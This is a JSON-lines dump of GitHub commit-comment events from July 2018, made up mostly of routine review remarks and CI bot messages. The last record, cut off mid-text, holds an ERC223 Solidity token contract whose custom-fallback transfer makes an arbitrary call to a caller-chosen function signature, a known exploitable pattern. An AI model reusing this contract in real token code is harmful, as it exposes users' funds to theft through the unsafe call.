{"id":"7976716856","type":"CommitCommentEvent","actor":{"login":"yiy114"},"repo":{"name":"yiy114/token"},"payload":{"comment":{"id":29734803,"position":null,"line":null,"path":null,"commit_id":"c39b71390d42c17449b1e4f94f1d5d2b772c67e8","created_at":"2018-07-17T13:30:49Z","updated_at":"2018-07-17T13:30:49Z","author_association":"OWNER","body":"add mtt"}},"created_at":"2018-07-17T13:30:49Z"}
{"id":"7976718396","type":"CommitCommentEvent","actor":{"login":"luyong6"},"repo":{"name":"open-power/snap"},"payload":{"comment":{"id":29734805,"position":null,"line":null,"path":null,"commit_id":"5647697c51a3ddee069a2ae87fcb92aac18b626e","created_at":"2018-07-17T13:31:03Z","updated_at":"2018-07-17T13:31:03Z","author_association":"COLLABORATOR","body":"Nice catch! Thanks jsvogt."}},"created_at":"2018-07-17T13:31:03Z"}
{"id":"7976719070","type":"CommitCommentEvent","actor":{"login":"cjshawMIT"},"repo":{"name":"UOC/dlkit"},"payload":{"comment":{"id":29734806,"position":4,"line":960,"path":"dlkit/json_/osid/objects.py","commit_id":"39a720565caa590f7527aa0472695edb7fcb5c8b","created_at":"2018-07-17T13:31:10Z","updated_at":"2018-07-17T13:31:10Z","author_association":"NONE","body":"You should make this change in the generators, so that it persists and propagates:\r\n\r\nhttps://github.com/mitsei/dlkit_builders/blob/d01e22bbf40b503bd3f8fd17a71c4e8bfb4b76f2/jsonosid_templates/osid.py#L1074"}},"created_at":"2018-07-17T13:31:10Z"}
{"id":"7976729581","type":"CommitCommentEvent","actor":{"login":"aescolar"},"repo":{"name":"aescolar/zephyr"},"payload":{"comment":{"id":29734818,"position":92,"line":126,"path":"boards/posix/native_posix/timer_model.c","commit_id":"b68fd79426520ea9452699b6046a8a225058802b","created_at":"2018-07-17T13:32:49Z","updated_at":"2018-07-17T13:32:49Z","author_association":"OWNER","body":"The resolution of the time in the HW models is 1 µs. That's why I rounded it.\r\nTherefore the delaying of zephyr execution will not have a better accuracy than 1us. (I would expect that no host would ever schedule us with that precision anyhow). \r\nMore by email.\r\n"}},"created_at":"2018-07-17T13:32:49Z"}
{"id":"7976729891","type":"CommitCommentEvent","actor":{"login":"lmwit"},"repo":{"name":"lmwit/lmwit.github.io"},"payload":{"comment":{"id":29734819,"position":null,"line":null,"path":null,"commit_id":"da255a5cd7db3e5d986f21763546c13eda36dfa8","created_at":"2018-07-17T13:32:52Z","updated_at":"2018-07-17T13:32:52Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-17T13:32:52Z"}
{"id":"7976732955","type":"CommitCommentEvent","actor":{"login":"yiy114"},"repo":{"name":"yiy114/token"},"payload":{"comment":{"id":29734829,"position":null,"line":null,"path":null,"commit_id":"bd284496c7d4b842e803aa1c50d8a3e71955d7f4","created_at":"2018-07-17T13:33:21Z","updated_at":"2018-07-17T13:33:21Z","author_association":"OWNER","body":"add mtt "}},"created_at":"2018-07-17T13:33:21Z"}
{"id":"7976735914","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29734835,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-17T13:33:52Z","updated_at":"2018-07-17T13:33:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T13:33:52Z"}
{"id":"7976738004","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29734838,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-17T13:34:13Z","updated_at":"2018-07-17T13:34:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T13:34:13Z"}
{"id":"7976746158","type":"CommitCommentEvent","actor":{"login":"jdieter"},"repo":{"name":"openSUSE/libsolv"},"payload":{"comment":{"id":29734844,"position":null,"line":null,"path":null,"commit_id":"75d03059cdaf7770d2217fafaba6af732cd860ba","created_at":"2018-07-17T13:35:35Z","updated_at":"2018-07-17T13:35:35Z","author_association":"NONE","body":"I have to say, this is nice and succinct, but I just wanted to check that chksum_id(3) would only verify the first 128 bits of the SHA512 checksum?"}},"created_at":"2018-07-17T13:35:35Z"}
{"id":"7976746371","type":"CommitCommentEvent","actor":{"login":"lamr14"},"repo":{"name":"mauromoura/opendaylight-firewall"},"payload":{"comment":{"id":29734845,"position":null,"line":null,"path":null,"commit_id":"70444f4db50d7f6bdcfc9a68df2b5b618f4f1cca","created_at":"2018-07-17T13:35:37Z","updated_at":"2018-07-17T13:35:37Z","author_association":"NONE","body":"I have the same problem as the user sysong13...\r\n"}},"created_at":"2018-07-17T13:35:37Z"}
{"id":"7976748804","type":"CommitCommentEvent","actor":{"login":"duguarun"},"repo":{"name":"duguarun/Myscrap"},"payload":{"comment":{"id":29734847,"position":null,"line":null,"path":null,"commit_id":"697a4ca0a4e4fba8780e0301f43e486d0fa23e87","created_at":"2018-07-17T13:36:02Z","updated_at":"2018-07-17T13:36:02Z","author_association":"OWNER","body":"Cycle search results with all the pages"}},"created_at":"2018-07-17T13:36:02Z"}
{"id":"7976750346","type":"CommitCommentEvent","actor":{"login":"inouetoukyou"},"repo":{"name":"wbond/package_control_channel"},"payload":{"comment":{"id":29734849,"position":null,"line":null,"path":null,"commit_id":"e27567faa364ed24df3962bac54beb05fa1bf501","created_at":"2018-07-17T13:36:18Z","updated_at":"2018-07-17T13:36:18Z","author_association":"NONE","body":"This build system can build and run in terminal for single file C &amp; C++.  \r\nI wrote this because the original one only supported output but not input. "}},"created_at":"2018-07-17T13:36:18Z"}
{"id":"7976755191","type":"CommitCommentEvent","actor":{"login":"FerryJansen"},"repo":{"name":"FerryJansen/xld-folder-plugin"},"payload":{"comment":{"id":29734851,"position":null,"line":null,"path":null,"commit_id":"77de258f5df4e39baa8f7a7735096ad690dffff3","created_at":"2018-07-17T13:37:03Z","updated_at":"2018-07-17T13:37:03Z","author_association":"OWNER","body":"When a file is extractd that already exists(during a Create step in XL Deploy) the task will get stuck waiting for confimation. This change adds the option will respond with \"yes to all\" to the prompt, overwriting the existing files."}},"created_at":"2018-07-17T13:37:03Z"}
{"id":"7976761675","type":"CommitCommentEvent","actor":{"login":"YuriyNasretdinov"},"repo":{"name":"kadefor/GoSSHa"},"payload":{"comment":{"id":29734858,"position":76,"line":475,"path":"main.go","commit_id":"d8ce48d8954b2c44f2ba70d7055a248620febb85","created_at":"2018-07-17T13:38:06Z","updated_at":"2018-07-17T13:38:06Z","author_association":"NONE","body":"I suggest that you parse enviroment variables param right after flag.Parse() so that you do not just silently ignore incorrect values in prepareSession()"}},"created_at":"2018-07-17T13:38:06Z"}
{"id":"7976763168","type":"CommitCommentEvent","actor":{"login":"farfromrefug"},"repo":{"name":"NativeScript/nativescript-dev-webpack"},"payload":{"comment":{"id":29734860,"position":null,"line":null,"path":null,"commit_id":"a68778e7c576e0ec75b73beedfaa2fee08a97511","created_at":"2018-07-17T13:38:20Z","updated_at":"2018-07-17T13:38:20Z","author_association":"NONE","body":"How do you actually use those source maps within the app? There is no mention of this anywhere. And source-map-support could work with android because v8 supports ```prepareStackTrace``` but that would not work on iOS. "}},"created_at":"2018-07-17T13:38:20Z"}
{"id":"7976773479","type":"CommitCommentEvent","actor":{"login":"diegoferigo"},"repo":{"name":"robotology-playground/docker_images"},"payload":{"comment":{"id":29734893,"position":null,"line":null,"path":null,"commit_id":"fdee6eb70962c27fa5f347503d0c39b443931c4d","created_at":"2018-07-17T13:39:58Z","updated_at":"2018-07-17T13:39:58Z","author_association":"MEMBER","body":"I had this modification locally since some while, if I recall well I had to do this due to `ProjectTags.cmake`. The value `YARP_TAG` passed from the command line is always overridden by `ProjectTags.cmake`, thus this workaround was necessary."}},"created_at":"2018-07-17T13:39:58Z"}
{"id":"7976775809","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29734899,"position":null,"line":null,"path":null,"commit_id":"b7157295dec257f92ef690f26402bce1c4a6bc9d","created_at":"2018-07-17T13:40:21Z","updated_at":"2018-07-17T13:40:21Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-134019 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-134019\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-17T13:40:21Z"}
{"id":"7976777701","type":"CommitCommentEvent","actor":{"login":"Kapral-Vodka"},"repo":{"name":"Kapral-Vodka/Redesigned-Discord-Octo-Robot"},"payload":{"comment":{"id":29734903,"position":null,"line":null,"path":null,"commit_id":"ce5c0f7f953483991ae6709d7169d1b945ce7da3","created_at":"2018-07-17T13:40:39Z","updated_at":"2018-07-17T13:40:39Z","author_association":"OWNER","body":"[Redesigned-Discord-Octo-Robot:master]1 new commit ce5c0f7 Wow, much webhook -  Cilantrelle"}},"created_at":"2018-07-17T13:40:39Z"}
{"id":"7976782883","type":"CommitCommentEvent","actor":{"login":"kKdH"},"repo":{"name":"logbee/keyscore"},"payload":{"comment":{"id":29734905,"position":null,"line":null,"path":null,"commit_id":"d87251d50af14e86f19f0eb6bb2ab5b0a9494718","created_at":"2018-07-17T13:41:31Z","updated_at":"2018-07-17T13:41:31Z","author_association":"CONTRIBUTOR","body":"Good point we never thougt of that kind of state a filter has. But `Ready` is in my opinion the wrong term. "}},"created_at":"2018-07-17T13:41:31Z"}
{"id":"7976782976","type":"CommitCommentEvent","actor":{"login":"edannenberg"},"repo":{"name":"OpenMage/magento-lts"},"payload":{"comment":{"id":29734906,"position":null,"line":null,"path":null,"commit_id":"afc58e89714d5ec3c7a24b4af571bc3d4d66f0e3","created_at":"2018-07-17T13:41:32Z","updated_at":"2018-07-17T13:41:32Z","author_association":"CONTRIBUTOR","body":"Why the dirty merges again? :("}},"created_at":"2018-07-17T13:41:32Z"}
{"id":"7976787119","type":"CommitCommentEvent","actor":{"login":"droidjahangir"},"repo":{"name":"droidjahangir/python"},"payload":{"comment":{"id":29734913,"position":null,"line":null,"path":null,"commit_id":"a0804876dd6f65e112d94c937ca5f9b644853913","created_at":"2018-07-17T13:42:13Z","updated_at":"2018-07-17T13:42:13Z","author_association":"OWNER","body":"এখানে পাইথনের intermediate ট্রপিক গুলোর মদ্ধে বেশ কয়েকটা আপডেট আছে, এর মদ্ধে আছে\r\n*  String concatenation & formatting\r\n* Argparse"}},"created_at":"2018-07-17T13:42:13Z"}
{"id":"7976791184","type":"CommitCommentEvent","actor":{"login":"3vts"},"repo":{"name":"O365/python-o365"},"payload":{"comment":{"id":29734917,"position":30,"line":120,"path":"O365/fluent_message.py","commit_id":"9ef36981167a428de8474891e818f4f4fb7e42cd","created_at":"2018-07-17T13:42:54Z","updated_at":"2018-07-17T13:42:54Z","author_association":"NONE","body":"Seems there's a typo in this line. Should be `url `instead of `usl`. This may impact the final behavior"}},"created_at":"2018-07-17T13:42:54Z"}
{"id":"7976791387","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29734918,"position":11,"line":11,"path":"ex17a.py","commit_id":"109780c78666a4370fa307023caee0eaaf492722","created_at":"2018-07-17T13:42:55Z","updated_at":"2018-07-17T13:42:55Z","author_association":"COLLABORATOR","body":"`connection_to_file_1 = open(file_1)`\r\n`conetetnt_of_file_1 = connection_to_file_1.read()`\r\n`connection_to_file_2 = open(file_2, \"w\")`\r\n`connection_to_file_2.write(content_of_file_1)`"}},"created_at":"2018-07-17T13:42:55Z"}
{"id":"7976794452","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29734921,"position":34,"line":34,"path":"src/main/java/ComputerProcess/ComputerProcess.java","commit_id":"687fb248cc943fd13cfde916db23a53194a72ac9","created_at":"2018-07-17T13:43:27Z","updated_at":"2018-07-17T13:43:27Z","author_association":"OWNER","body":"Получается все методы которые вызываются классом выше нужно создавать public  или package-private?"}},"created_at":"2018-07-17T13:43:27Z"}
{"id":"7976794898","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29734922,"position":26,"line":26,"path":"src/main/java/ComputerProcess/ComputerProcess.java","commit_id":"687fb248cc943fd13cfde916db23a53194a72ac9","created_at":"2018-07-17T13:43:31Z","updated_at":"2018-07-17T13:43:31Z","author_association":"OWNER","body":"Ошибки не возникает, все работает."}},"created_at":"2018-07-17T13:43:31Z"}
{"id":"7976794983","type":"CommitCommentEvent","actor":{"login":"Eternal-SQB"},"repo":{"name":"Playaaa/playplay"},"payload":{"comment":{"id":29734923,"position":5,"line":21,"path":"templates/login.html","commit_id":"e3f802d9a170c96cd94cef520fd0458c168db800","created_at":"2018-07-17T13:43:32Z","updated_at":"2018-07-17T13:43:32Z","author_association":"CONTRIBUTOR","body":"<h1>外卖</h1>"}},"created_at":"2018-07-17T13:43:32Z"}
{"id":"7976799583","type":"CommitCommentEvent","actor":{"login":"stephenmathieson"},"repo":{"name":"jaimeiniesta/axe-webdriverjstest"},"payload":{"comment":{"id":29734934,"position":8,"line":8,"path":"handler.js","commit_id":"b8ae3778b9369ccf31248c87a04705f5c65c3d89","created_at":"2018-07-17T13:44:15Z","updated_at":"2018-07-17T13:44:15Z","author_association":"NONE","body":"You could use [`chromedriver.path`](http://npmjs.org/chromedriver) here and install it locally :)"}},"created_at":"2018-07-17T13:44:15Z"}
{"id":"7976799662","type":"CommitCommentEvent","actor":{"login":"cenka"},"repo":{"name":"cenakas/First-Python-programs"},"payload":{"comment":{"id":29734936,"position":14,"line":14,"path":"ex17a.py","commit_id":"109780c78666a4370fa307023caee0eaaf492722","created_at":"2018-07-17T13:44:16Z","updated_at":"2018-07-17T13:44:16Z","author_association":"COLLABORATOR","body":"`connection_to_file_2 = open(file_2, \"w\")`\r\n`connection_to_file_2.write(open(file_1).read()`"}},"created_at":"2018-07-17T13:44:16Z"}
{"id":"7976800778","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29734941,"position":null,"line":null,"path":null,"commit_id":"36f63430821c1bf6422561078ba660c338d0d060","created_at":"2018-07-17T13:44:26Z","updated_at":"2018-07-17T13:44:26Z","author_association":"NONE","body":"> Dear @r7vmc:\n> I regret to inform you that the release you submitted, named \"**ApiUpdaterDP**\" (v4.0.0), for the project [ApiUpdaterDP](https://poggit.pmmp.io/ci/r7vmc/ApiUpdaterDP/ApiUpdaterDP) on 2018-07-17T12:47:31.000Z, has been rejected.\n\nAPI-updating plugins are not acceptable on Poggit, even if your plugin attempts to address part of the API changes (but not all).\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-17T13:44:26Z"}
{"id":"7976802147","type":"CommitCommentEvent","actor":{"login":"stephenmathieson"},"repo":{"name":"jaimeiniesta/axe-webdriverjstest"},"payload":{"comment":{"id":29734943,"position":21,"line":21,"path":"handler.js","commit_id":"b8ae3778b9369ccf31248c87a04705f5c65c3d89","created_at":"2018-07-17T13:44:39Z","updated_at":"2018-07-17T13:44:39Z","author_association":"NONE","body":"Missed a `const` 😉 "}},"created_at":"2018-07-17T13:44:39Z"}
{"id":"7976803342","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology-playground/docker_images"},"payload":{"comment":{"id":29734945,"position":null,"line":null,"path":null,"commit_id":"fdee6eb70962c27fa5f347503d0c39b443931c4d","created_at":"2018-07-17T13:44:50Z","updated_at":"2018-07-17T13:44:50Z","author_association":"MEMBER","body":"> The value `YARP_TAG` passed from the command line is always overridden by `ProjectTags.cmake`, thus this workaround was necessary.\r\n\r\nExactly. I think the fact that `ProjectTags.cmake` has the priority over command line specified options is undesired and should be fixed. "}},"created_at":"2018-07-17T13:44:50Z"}
{"id":"7976805211","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29734953,"position":9,"line":371,"path":"assembl/static2/js/app/utils/translations.js","commit_id":"cf92e7f2b0a4bedd8d0d41b70e95665993732a39","created_at":"2018-07-17T13:45:09Z","updated_at":"2018-07-17T13:45:09Z","author_association":"CONTRIBUTOR","body":"fixed in https://github.com/assembl/assembl/commit/aa067a242f89d2a853169bcdd5487c8a4d46b4cf"}},"created_at":"2018-07-17T13:45:09Z"}
{"id":"7976810191","type":"CommitCommentEvent","actor":{"login":"boyeborg"},"repo":{"name":"andnorda/pickorders2.0"},"payload":{"comment":{"id":29734965,"position":null,"line":null,"path":null,"commit_id":"521a21482dc31568223e2848e23081988a748d04","created_at":"2018-07-17T13:45:55Z","updated_at":"2018-07-17T13:45:55Z","author_association":"NONE","body":"these pretzels makes me thirsty"}},"created_at":"2018-07-17T13:45:55Z"}
{"id":"7976810418","type":"CommitCommentEvent","actor":{"login":"agronholm"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29734966,"position":null,"line":null,"path":null,"commit_id":"50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8","created_at":"2018-07-17T13:45:57Z","updated_at":"2018-07-17T13:45:57Z","author_association":"CONTRIBUTOR","body":"Hmm, okay. Where is `generate_requirements()` called more than once?"}},"created_at":"2018-07-17T13:45:57Z"}
{"id":"7976810781","type":"CommitCommentEvent","actor":{"login":"notatoken"},"repo":{"name":"notatoken/Nota"},"payload":{"comment":{"id":29734968,"position":1,"line":1,"path":".gitattributes","commit_id":"2e9bd6ef49d9186049c3a7267ab5dc48ced91507","created_at":"2018-07-17T13:46:00Z","updated_at":"2018-07-17T13:46:00Z","author_association":"OWNER","body":"pragma solidity ^0.4.18;\r\n\r\n/**\r\n * @title SafeMath\r\n * @dev Math operations with safety checks that throw on error\r\n */\r\nlibrary SafeMath {\r\n    function mul(uint256 a, uint256 b) internal pure returns (uint256) {\r\n        if (a == 0) {\r\n            return 0;\r\n        }\r\n        uint256 c = a * b;\r\n        assert(c / a == b);\r\n        return c;\r\n    }\r\n\r\n    function div(uint256 a, uint256 b) internal pure returns (uint256) {\r\n        // assert(b > 0); // Solidity automatically throws when dividing by 0\r\n        uint256 c = a / b;\r\n        // assert(a == b * c + a % b); // There is no case in which this doesn't hold\r\n        return c;\r\n    }\r\n\r\n    function sub(uint256 a, uint256 b) internal pure returns (uint256) {\r\n        assert(b <= a);\r\n        return a - b;\r\n    }\r\n\r\n    function add(uint256 a, uint256 b) internal pure returns (uint256) {\r\n        uint256 c = a + b;\r\n        assert(c >= a);\r\n        return c;\r\n    }\r\n}\r\n\r\n\r\n\r\n/**\r\n * @title Ownable\r\n * @dev The Ownable contract has an owner address, and provides basic authorization\r\n *      control functions, this simplifies the implementation of \"user permissions\".\r\n */\r\ncontract Ownable {\r\n    address public owner;\r\n\r\n    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);\r\n\r\n    /**\r\n     * @dev The Ownable constructor sets the original `owner` of the contract to the\r\n     *      sender account.\r\n     */\r\n    function Ownable() public {\r\n        owner = msg.sender;\r\n    }\r\n\r\n    /**\r\n     * @dev Throws if called by any account other than the owner.\r\n     */\r\n    modifier onlyOwner() {\r\n        require(msg.sender == owner);\r\n        _;\r\n    }\r\n\r\n    /**\r\n     * @dev Allows the current owner to transfer control of the contract to a newOwner.\r\n     * @param newOwner The address to transfer ownership to.\r\n     */\r\n    function transferOwnership(address newOwner) onlyOwner public {\r\n        require(newOwner != address(0));\r\n        OwnershipTransferred(owner, newOwner);\r\n        owner = newOwner;\r\n    }\r\n}\r\n\r\n\r\n\r\n/**\r\n * @title ERC223\r\n * @dev ERC223 contract interface with ERC20 functions and events\r\n *      Fully backward compatible with ERC20\r\n *      Recommended implementation used at https://github.com/Dexaran/ERC223-token-standard/tree/Recommended\r\n */\r\ncontract ERC223 {\r\n    uint public totalSupply;\r\n\r\n    // ERC223 and ERC20 functions and events\r\n    function balanceOf(address who) public view returns (uint);\r\n    function totalSupply() public view returns (uint256 _supply);\r\n    function transfer(address to, uint value) public returns (bool ok);\r\n    function transfer(address to, uint value, bytes data) public returns (bool ok);\r\n    function transfer(address to, uint value, bytes data, string customFallback) public returns (bool ok);\r\n    event Transfer(address indexed from, address indexed to, uint value, bytes indexed data);\r\n\r\n    // ERC223 functions\r\n    function name() public view returns (string _name);\r\n    function symbol() public view returns (string _symbol);\r\n    function decimals() public view returns (uint8 _decimals);\r\n\r\n    // ERC20 functions and events\r\n    function transferFrom(address _from, address _to, uint256 _value) public returns (bool success);\r\n    function approve(address _spender, uint256 _value) public returns (bool success);\r\n    function allowance(address _owner, address _spender) public view returns (uint256 remaining);\r\n    event Transfer(address indexed _from, address indexed _to, uint256 _value);\r\n    event Approval(address indexed _owner, address indexed _spender, uint _value);\r\n}\r\n\r\n\r\n\r\n/**\r\n * @title ContractReceiver\r\n * @dev Contract that is working with ERC223 tokens\r\n */\r\n contract ContractReceiver {\r\n\r\n    struct TKN {\r\n        address sender;\r\n        uint value;\r\n        bytes data;\r\n        bytes4 sig;\r\n    }\r\n\r\n    function tokenFallback(address _from, uint _value, bytes _data) public pure {\r\n        TKN memory tkn;\r\n        tkn.sender = _from;\r\n        tkn.value = _value;\r\n        tkn.data = _data;\r\n        uint32 u = uint32(_data[3]) + (uint32(_data[2]) << 8) + (uint32(_data[1]) << 16) + (uint32(_data[0]) << 24);\r\n        tkn.sig = bytes4(u);\r\n        \r\n        /*\r\n         * tkn variable is analogue of msg variable of Ether transaction\r\n         * tkn.sender is person who initiated this token transaction   (analogue of msg.sender)\r\n         * tkn.value the number of tokens that were sent   (analogue of msg.value)\r\n         * tkn.data is data of token transaction   (analogue of msg.data)\r\n         * tkn.sig is 4 bytes signature of function if data of token transaction is a function execution\r\n         */\r\n    }\r\n}\r\n\r\n/**\r\n * @title Nota\r\n * @author Nota\r\n * @dev Nota is an ERC223 Token with ERC20 functions and events\r\n *      Fully backward compatible with ERC20\r\n */\r\ncontract Nota is ERC223, Ownable {\r\n    using SafeMath for uint256;\r\n\r\n    string public name = \"Nota\";\r\n    string public symbol = \"NOTA\";\r\n    uint8 public decimals = 8;\r\n    uint256 public totalSupply = 30e9 * 1e8;\r\n    uint256 public distributeAmount = 0;\r\n    bool public mintingFinished = false;\r\n    \r\n    mapping(address => uint256) public balanceOf;\r\n    mapping(address => mapping (address => uint256)) public allowance;\r\n    mapping (address => bool) public frozenAccount;\r\n    mapping (address => uint256) public unlockUnixTime;\r\n    \r\n    event FrozenFunds(address indexed target, bool frozen);\r\n    event LockedFunds(address indexed target, uint256 locked);\r\n    event Burn(address indexed from, uint256 amount);\r\n    event Mint(address indexed to, uint256 amount);\r\n    event MintFinished();\r\n\r\n\r\n    /** \r\n     * @dev Constructor is called only once and can not be called again\r\n     */\r\n    function Nota() public {\r\n        balanceOf[msg.sender] = totalSupply;\r\n    }\r\n\r\n\r\n    function name() public view returns (string _name) {\r\n        return name;\r\n    }\r\n\r\n    function symbol() public view returns (string _symbol) {\r\n        return symbol;\r\n    }\r\n\r\n    function decimals() public view returns (uint8 _decimals) {\r\n        return decimals;\r\n    }\r\n\r\n    function totalSupply() public view returns (uint256 _totalSupply) {\r\n        return totalSupply;\r\n    }\r\n\r\n    function balanceOf(address _owner) public view returns (uint256 balance) {\r\n        return balanceOf[_owner];\r\n    }\r\n\r\n\r\n    /**\r\n     * @dev Prevent targets from sending or receiving tokens\r\n     * @param targets Addresses to be frozen\r\n     * @param isFrozen either to freeze it or not\r\n     */\r\n    function freezeAccounts(address[] targets, bool isFrozen) onlyOwner public {\r\n        require(targets.length > 0);\r\n\r\n        for (uint j = 0; j < targets.length; j++) {\r\n            require(targets[j] != 0x0);\r\n            frozenAccount[targets[j]] = isFrozen;\r\n            FrozenFunds(targets[j], isFrozen);\r\n        }\r\n    }\r\n\r\n    /**\r\n     * @dev Prevent targets from sending or receiving tokens by setting Unix times\r\n     * @param targets Addresses to be locked funds\r\n     * @param unixTimes Unix times when locking up will be finished\r\n     */\r\n    function lockupAccounts(address[] targets, uint[] unixTimes) onlyOwner public {\r\n        require(targets.length > 0\r\n                && targets.length == unixTimes.length);\r\n                \r\n        for(uint j = 0; j < targets.length; j++){\r\n            require(unlockUnixTime[targets[j]] < unixTimes[j]);\r\n            unlockUnixTime[targets[j]] = unixTimes[j];\r\n            LockedFunds(targets[j], unixTimes[j]);\r\n        }\r\n    }\r\n\r\n\r\n    /**\r\n     * @dev Function that is called when a user or another contract wants to transfer funds\r\n     */\r\n    function transfer(address _to, uint _value, bytes _data, string _custom_fallback) public returns (bool success) {\r\n        require(_value > 0\r\n                && frozenAccount[msg.sender] == false \r\n                && frozenAccount[_to] == false\r\n                && now > unlockUnixTime[msg.sender] \r\n                && now > unlockUnixTime[_to]);\r\n\r\n        if (isContract(_to)) {\r\n            require(balanceOf[msg.sender] >= _value);\r\n            balanceOf[msg.sender] = balanceOf[msg.sender].sub(_value);\r\n            balanceOf[_to] = balanceOf[_to].add(_value);\r\n            assert(_to.call.value(0)(bytes4(keccak256(_custom_fallback)), msg.sender, _value, _data));\r\n            Transfer(msg.sender, _to, _value, _data);\r\n            Transfer(msg.sender, _to, _value);\r\n            return true;\r\n        } else {\r\n            return transferToAddress(_to, _value, _data);\r\n        }\r\n    }\r\n\r\n    function transfer(address _to, uint _value, bytes _data) public  returns (bool success) {\r\n        require(_value > 0\r\n                && frozenAccount[msg.sender] == false \r\n                && frozenAccount[_to] == false\r\n                && now > unlockUnixTime[msg.sender] \r\n                && now > unlockUnixTime[_to]);\r\n\r\n        if (isContract(_to)) {\r\n            return transferToContract(_to, _value, _data);\r\n        } else {\r\n            return transferToAddress(_to, _value, _data);\r\n        }\r\n    }\r\n\r\n    /**\r\n     * @dev Standard function transfer similar to ERC20 transfer with no _data\r\n     *      Added due to backwards compatibility reasons\r\n     */\r\n    function transfer(address _to, uint _value) public returns (bool success) {\r\n        require(_value > 0\r\n                && frozenAccount[msg.sender] == false \r\n                && frozenAccount[_to] == false\r\n                && now > unlockUnixTime[msg.sender] \r\n                && now > unlockUnixTime[_to]);\r\n\r\n        bytes memory empty;\r\n        if (isContract(_to)) {\r\n            return transferToContract(_to, _value, empty);\r\n        } else {\r\n            return transferToAddress(_to, _value, empty);\r\n        }\r\n    }\r\n\r\n    // assemble the given address bytecode. If bytecode exists then the _addr is a contract.\r\n    function isContract(address _addr) private view returns (bool is_contract) {\r\n        uint length;\r\n        assembly {\r\n            //retrieve the size of the code on target address, this needs assembly\r\n            length := extcodesize(_addr)\r\n        }\r\n        return (length > 0);\r\n    }\r\n\r\n    // function that is called when transaction target is an address\r\n    function transferToAddress(address _to, uint _value, bytes _data) private returns (bool success) {\r\n        require(balanceOf[msg.sender] >= _value);\r\n        balanceOf[msg.sender] = balanceOf[msg.sender].sub(_value);\r\n        balanceOf[_to] = balanceOf[_to].add(_value);\r\n        Transfer(msg.sender, _to, _value, _data);\r\n        Transfer(msg.sender, _to, _value);\r\n        return true;\r\n    }\r\n\r\n    // function that is called when transaction target is a contract\r\n    function transferToContract(address _to, uint _value, bytes _data) private returns (bool success) {\r\n        require(balanceOf[msg.sender] >= _value);\r\n        balanceOf[msg.sender] = balanceOf[msg.sender].sub(_value);\r\n        balanceOf[_to] = balanceOf[_to].add(_value);\r\n        ContractReceiver receiver = ContractReceiver(_to);\r\n        receiver.tokenFallback(msg.sender, _value, _data);\r\n        Transfer(msg.sender, _to, _value, _data);\r\n        Transfer(msg.sender, _to, _value);\r\n        return true;\r\n    }\r\n\r\n\r\n\r\n    /**\r\n     * @dev Transfer tokens from one address to another\r\n     *      Added due to backwards compatibility with ERC20\r\n     * 